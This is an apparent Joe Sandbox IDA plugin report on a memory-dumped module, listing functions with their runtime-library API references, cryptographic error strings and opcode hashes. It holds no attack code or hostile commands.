ValueNames, xrefs: 6D0BB9D7
ThisPointer:, xrefs: 6D0BBA6B, 6D0BBAC0

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: _strncmptype_info::operator!=
String ID: ThisPointer:$ValueNames
API String ID: 1333309372-2375088429
Opcode ID: 68c15a22844c8086c5daad30f3afb3d1ebbd9f3c01681bc9fbc688a4ece16633
Instruction ID: 56127d132c10cc7a185cfb0f4380623f1d2e45bafc78d67357dc7b77aea540bb
Opcode Fuzzy Hash: 68c15a22844c8086c5daad30f3afb3d1ebbd9f3c01681bc9fbc688a4ece16633
Instruction Fuzzy Hash: A551C17120C3455FE3148F65D8D0B7BBBEAAF86258F054A5CE9DA8B281C773E809C752

Uniqueness

Uniqueness Score: -1.00%

Function 6D0A1B70 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 165COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6D0A1C1A

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

__CxxThrowException@8.LIBCMT ref: 6D0A1CDE
__CxxThrowException@8.LIBCMT ref: 6D0A1D3E

Strings

TF_SignerBase: the recoverable message part is too long for the given key and algorithm, xrefs: 6D0A1CF0
TF_SignerBase: this algorithm does not support messsage recovery or the key is too short, xrefs: 6D0A1C67

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: TF_SignerBase: the recoverable message part is too long for the given key and algorithm$TF_SignerBase: this algorithm does not support messsage recovery or the key is too short
API String ID: 3476068407-3371871069
Opcode ID: 0c4adbd8841907f124dc7586cc1b692f4c5d163be4faf9c77975200c967b3485
Instruction ID: 1b95374133162523db985bb3bdeb36d5a20910fedeee4e2449e14132c14a9a82
Opcode Fuzzy Hash: 0c4adbd8841907f124dc7586cc1b692f4c5d163be4faf9c77975200c967b3485
Instruction Fuzzy Hash: 13514C712087419FE364DF58C880F9FB7E9BFC8314F108A1DE68987391DB74A9058BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D064010 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6D06402A

Part of subcall function 6D0C9125: std::exception::exception.LIBCMT ref: 6D0C913A
Part of subcall function 6D0C9125: __CxxThrowException@8.LIBCMT ref: 6D0C914F
Part of subcall function 6D0C9125: std::exception::exception.LIBCMT ref: 6D0C9160

std::_Xinvalid_argument.LIBCPMT ref: 6D064067

Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C90ED
Part of subcall function 6D0C90D8: __CxxThrowException@8.LIBCMT ref: 6D0C9102
Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C9113

_memmove.LIBCMT ref: 6D0640C8

Strings

invalid string position, xrefs: 6D064025
string too long, xrefs: 6D064062

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 1615890066-4289949731
Opcode ID: 2d72ee7fbfe6c2585fd43cf7612c91acd814aef4d3aa0995ac12d4006f7b4156
Instruction ID: 9594ce560606fbe1a66ff861af84af7bbda8776bd9b73186d3b9583f8f52482a
Opcode Fuzzy Hash: 2d72ee7fbfe6c2585fd43cf7612c91acd814aef4d3aa0995ac12d4006f7b4156
Instruction Fuzzy Hash: EE31B832308560ABF7218E5CE890B5EF7E9EB99665F21052FE151CB281D772D84087B2

Uniqueness

Uniqueness Score: -1.00%

Function 6D0CC23B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 6D0CC24E

Part of subcall function 6D0CC1A9: ___BuildCatchObjectHelper.LIBCMT ref: 6D0CC1DF

_UnwindNestedFrames.LIBCMT ref: 6D0CC265
___FrameUnwindToState.LIBCMT ref: 6D0CC273

Strings

csm, xrefs: 6D0CC23D
csm, xrefs: 6D0CC24A, 6D0CC25F, 6D0CC272, 6D0CC290, 6D0CC2A0

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
Instruction ID: af3dc0baa2fdcc60cc244dcf389e2f4556ae1746df6a5a9ccb45ebef2d0bab57
Opcode Fuzzy Hash: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
Instruction Fuzzy Hash: 3901E43140510ABBEF125F91CC45FEE7F6AFF08358F158010BE5816160D73699A2EBAA

Uniqueness

Uniqueness Score: -1.00%

Function 6D0A2300 Relevance: 7.8, APIs: 5, Instructions: 257COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6D0A23F3
_memmove.LIBCMT ref: 6D0A2460

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 76e30c2c22496b257e35339d65e3fccf2951922972dbde4e4781bd49b5ba131f
Instruction ID: 32907647d11f28c9119c5938b20c20b7e2af5a4bbcb87c0073cf3b0606b3fbf1
Opcode Fuzzy Hash: 76e30c2c22496b257e35339d65e3fccf2951922972dbde4e4781bd49b5ba131f
Instruction Fuzzy Hash: 1A918E712087029FE724DFA9D980B2BB7E9FB89604F144A2DE595C7341E734E905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D091D50 Relevance: 7.6, APIs: 5, Instructions: 144timesleepCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(400BD10B), ref: 6D091D91
timeGetTime.WINMM(400BD10B), ref: 6D091D9F
timeGetTime.WINMM ref: 6D091DBB
timeGetTime.WINMM ref: 6D091DC9
Sleep.KERNEL32(00000032), ref: 6D091DDC

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Timetime$Sleep
String ID:
API String ID: 4176159691-0
Opcode ID: 201066645682d8ba9e61e42051858d14bee9f4a67eaafd0ba71104e7cc11ed4c
Instruction ID: d86a06d59516c75be45f5b5de7828036cc6c4d6109a793fc16e062499da54f60
Opcode Fuzzy Hash: 201066645682d8ba9e61e42051858d14bee9f4a67eaafd0ba71104e7cc11ed4c
Instruction Fuzzy Hash: 47518EB1E042459FFB10DFA9D9857AD7BF8BB05304F55446EE508DB380D7B095409BA3

Uniqueness

Uniqueness Score: -1.00%

Function 6D076D40 Relevance: 7.6, APIs: 5, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

_rand.LIBCMT ref: 6D076DEA

Part of subcall function 6D0C9E0C: __getptd.LIBCMT ref: 6D0C9E0C

std::exception::exception.LIBCMT ref: 6D076E17
__CxxThrowException@8.LIBCMT ref: 6D076E2C
std::exception::exception.LIBCMT ref: 6D076E3B
__CxxThrowException@8.LIBCMT ref: 6D076E50

Part of subcall function 6D0C9BB5: std::exception::exception.LIBCMT ref: 6D0C9C04
Part of subcall function 6D0C9BB5: std::exception::exception.LIBCMT ref: 6D0C9C1E
Part of subcall function 6D0C9BB5: __CxxThrowException@8.LIBCMT ref: 6D0C9C2F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$__getptd_malloc_rand
String ID:
API String ID: 2791304714-0
Opcode ID: 59d09d688e3e0ee28477778dac80fca657a4c7027107aa1d8e2add3a6625b62b
Instruction ID: 53528ca747e263a98fae710fc067360286f1c90ee8c5749d6dd6c17e809c8a6a
Opcode Fuzzy Hash: 59d09d688e3e0ee28477778dac80fca657a4c7027107aa1d8e2add3a6625b62b
Instruction Fuzzy Hash: 8D3132B18007089FD760CF68D880B9ABBF4FB08314F54896ED89A9BB41D775E604CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D077750 Relevance: 7.6, APIs: 5, Instructions: 79COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6D077761
LeaveCriticalSection.KERNEL32(00000000,?), ref: 6D077782
EnterCriticalSection.KERNEL32(00000018), ref: 6D077796
LeaveCriticalSection.KERNEL32(00000018), ref: 6D0777CE
QueueUserWorkItem.KERNEL32(6D091D50,00000000,00000010), ref: 6D07780C

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ItemQueueUserWork
String ID:
API String ID: 584243675-0
Opcode ID: f46efc09936d3d86eebd4dcaf1606bc38d9c95db91b9488eaa3b8f7ae15343fa
Instruction ID: 51be4906f122688281b939036ca2176355c4f1c17a73846afb927efde7e6853e
Opcode Fuzzy Hash: f46efc09936d3d86eebd4dcaf1606bc38d9c95db91b9488eaa3b8f7ae15343fa
Instruction Fuzzy Hash: 0B21D131945209AFEB20CF64C984BAFBBF8FB85741F00886DE5568B640D770E608CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D065AAC Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6D065ACB

Part of subcall function 6D0C9533: std::exception::_Copy_str.LIBCMT ref: 6D0C954E

__CxxThrowException@8.LIBCMT ref: 6D065ABC

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

__CxxThrowException@8.LIBCMT ref: 6D065AE0

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

std::exception::exception.LIBCMT ref: 6D065B18
__CxxThrowException@8.LIBCMT ref: 6D065B2D

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Exception@8Throw$std::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
String ID:
API String ID: 921928366-0
Opcode ID: 2c47b17c7ae7d990b81b11da499a34f5361797e2d7cdc6b118ee80a768269422
Instruction ID: aa7daa86c78fd0d567aac92adf666a7e631fb189868aa153a7e38bf2dd37268c
Opcode Fuzzy Hash: 2c47b17c7ae7d990b81b11da499a34f5361797e2d7cdc6b118ee80a768269422
Instruction Fuzzy Hash: 8A0100B68142097FEB04DFA4E945EEE7BB8AF18344F518159E909A7150EB34D604CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D0CF03B Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6D0CF047

Part of subcall function 6D0CEAE6: __getptd_noexit.LIBCMT ref: 6D0CEAE9
Part of subcall function 6D0CEAE6: __amsg_exit.LIBCMT ref: 6D0CEAF6

__amsg_exit.LIBCMT ref: 6D0CF067
__lock.LIBCMT ref: 6D0CF077
InterlockedDecrement.KERNEL32(?), ref: 6D0CF094
InterlockedIncrement.KERNEL32(06131658), ref: 6D0CF0BF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 455710cd146cd7381b838b8f0a5d209ddacdea8640f7331cfe33d2780e9c4127
Instruction ID: 82ec8c75dd6912f42bb2fefee8ea8bfbfb33ad2e4b4588345df479316733c460
Opcode Fuzzy Hash: 455710cd146cd7381b838b8f0a5d209ddacdea8640f7331cfe33d2780e9c4127
Instruction Fuzzy Hash: 6E019631946712ABFB11AF65900476E7BB8BF05F18F21000AE914E7284CF74A991DBD3

Uniqueness

Uniqueness Score: -1.00%

Function 6D0CF7BC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6D0CF7C8

Part of subcall function 6D0CEAE6: __getptd_noexit.LIBCMT ref: 6D0CEAE9
Part of subcall function 6D0CEAE6: __amsg_exit.LIBCMT ref: 6D0CEAF6

__getptd.LIBCMT ref: 6D0CF7DF
__amsg_exit.LIBCMT ref: 6D0CF7ED
__lock.LIBCMT ref: 6D0CF7FD
__updatetlocinfoEx_nolock.LIBCMT ref: 6D0CF811

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 2e2a997b5c6cace5740c623b412d55d5d485bafc07eabd473b64413aed803b4b
Instruction ID: f9d5d1ebf5b24f0b0a39b1ef3be89de0f1339501d03967bf675db65191480f36
Opcode Fuzzy Hash: 2e2a997b5c6cace5740c623b412d55d5d485bafc07eabd473b64413aed803b4b
Instruction Fuzzy Hash: E9F0B432A8E7019FF721ABB89401B5D3BE47F4072CF624209EA14A72D0DF749941DAA7

Uniqueness

Uniqueness Score: -1.00%

Function 6D0AE6E0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 331COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 6D0AE76F
_memcpy_s.LIBCMT ref: 6D0AE78B

Strings

, xrefs: 6D0AE85A

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: _memcpy_s
String ID:
API String ID: 2001391462-3916222277
Opcode ID: be41f356c7ebb035ebecd6ad2b9004fb590f7e4d5c7660c621e05b9d0c8f43d8
Instruction ID: 58f41d27925ad4c2966376871ef884a3247bfba58afcd103338ea867285fdaae
Opcode Fuzzy Hash: be41f356c7ebb035ebecd6ad2b9004fb590f7e4d5c7660c621e05b9d0c8f43d8
Instruction Fuzzy Hash: 0FC137756083028FE714CF68C890B6AB7E6FFC9314F184A2DE595C7252E771EA49CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6D0C8B60 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 252COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 6D0C8C40
_memset.LIBCMT ref: 6D0C8C56
_memmove.LIBCMT ref: 6D0C8DA8

Strings

EncodingParameters, xrefs: 6D0C8CD6

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: _memcpy_s_memmove_memset
String ID: EncodingParameters
API String ID: 4034675494-55378216
Opcode ID: aa90c5db467800b9ecdc9194cb079d865b46e1d57f6a889310dc7a311c192589
Instruction ID: b4c2defa896e2b5f8ce739223b757d6d5e825934cd9e4b8960066f769eba9671
Opcode Fuzzy Hash: aa90c5db467800b9ecdc9194cb079d865b46e1d57f6a889310dc7a311c192589
Instruction Fuzzy Hash: AF9157746083819FE700CF28C880B6FBBE5ABD9704F144A6DF99987351D671E945CB93

Uniqueness

Uniqueness Score: -1.00%

Function 6D0A1200 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 244COMMON

Download Yara Rule

APIs

Part of subcall function 6D0BD820: _memmove.LIBCMT ref: 6D0BD930

Part of subcall function 6D064010: std::_Xinvalid_argument.LIBCPMT ref: 6D06402A

__CxxThrowException@8.LIBCMT ref: 6D0A13D4

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

Part of subcall function 6D098D80: _malloc.LIBCMT ref: 6D098D8A
Part of subcall function 6D098D80: _malloc.LIBCMT ref: 6D098DAF

Strings

for this key, xrefs: 6D0A1348
: ciphertext length of , xrefs: 6D0A12E4
doesn't match the required length of , xrefs: 6D0A1316

